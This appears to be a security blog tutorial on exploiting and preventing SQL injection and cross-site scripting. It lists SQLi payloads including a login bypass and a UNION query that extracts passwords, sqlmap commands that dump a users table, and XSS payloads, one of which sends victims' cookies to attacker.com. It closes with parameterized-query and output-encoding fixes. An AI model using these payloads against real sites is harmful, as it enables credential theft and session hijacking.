SQL Injection (SQLI) and Cross-Site Scripting (XSS) Exploitation Techniques

By /

Listen to this Post

Featured Image
SQL Injection (SQLI) and Cross-Site Scripting (XSS) remain critical vulnerabilities in web applications. This article explores exploitation methods, detection, and mitigation techniques.

SQL Injection (SQLI) Exploitation

SQL Injection allows attackers to manipulate database queries by injecting malicious SQL code.

Common SQLI Techniques

1. Union-Based SQLI

' UNION SELECT username, password FROM users--

2. Boolean-Based Blind SQLI

' OR 1=1--

3. Time-Based Blind SQLI

'; IF (1=1) WAITFOR DELAY '0:0:5'--

Automated SQLI Detection with SQLmap

sqlmap -u "http://example.com/page?id=1" --dbs 
sqlmap -u "http://example.com/page?id=1" --tables -D database_name 
sqlmap -u "http://example.com/page?id=1" --dump -D database_name -T users

Cross-Site Scripting (XSS) Exploitation

XSS allows attackers to inject malicious scripts into web pages viewed by other users.

Types of XSS

1. Stored XSS (Persistent)

<script>alert('XSS')</script>

2. Reflected XSS (Non-Persistent)

http://example.com/search?q=<script>alert('XSS')</script>

3. DOM-Based XSS

<img src="x" onerror="alert('XSS')">

Testing for XSS with Burp Suite

1. Intercept a request with Burp Proxy.

2. Inject payloads in input fields.

3. Check for script execution in responses.

You Should Know: Practical Exploitation Steps

1. SQLI Exploitation in Login Bypass

Username: admin'-- 
Password: (anything)

This bypasses authentication if the query is vulnerable.

2. Extracting Database Information

sqlmap -u "http://example.com/login" --data="user=admin&pass=123" --level=5 --risk=3

3. Stealing Cookies via XSS

<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script>

4. Preventing SQLI & XSS

  • For SQLI: 
    $stmt = $pdo->prepare("SELECT  FROM users WHERE username = ?"); 
$stmt->execute([$username]);
  • For XSS: 
    echo htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');

What Undercode Say

SQLI and XSS remain top web vulnerabilities due to poor input validation. Always:
– Use parameterized queries (Prepared Statements).
– Implement CSP (Content Security Policy) for XSS.
– Sanitize user inputs on both client and server sides.
– Regularly test with tools like SQLmap, Burp Suite, and OWASP ZAP.

Expected Output:

A secure web application resistant to SQLI and XSS attacks, with proper input validation and output encoding.

Related URLs:

References:

Reported By: Shivangmauryaa Another – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: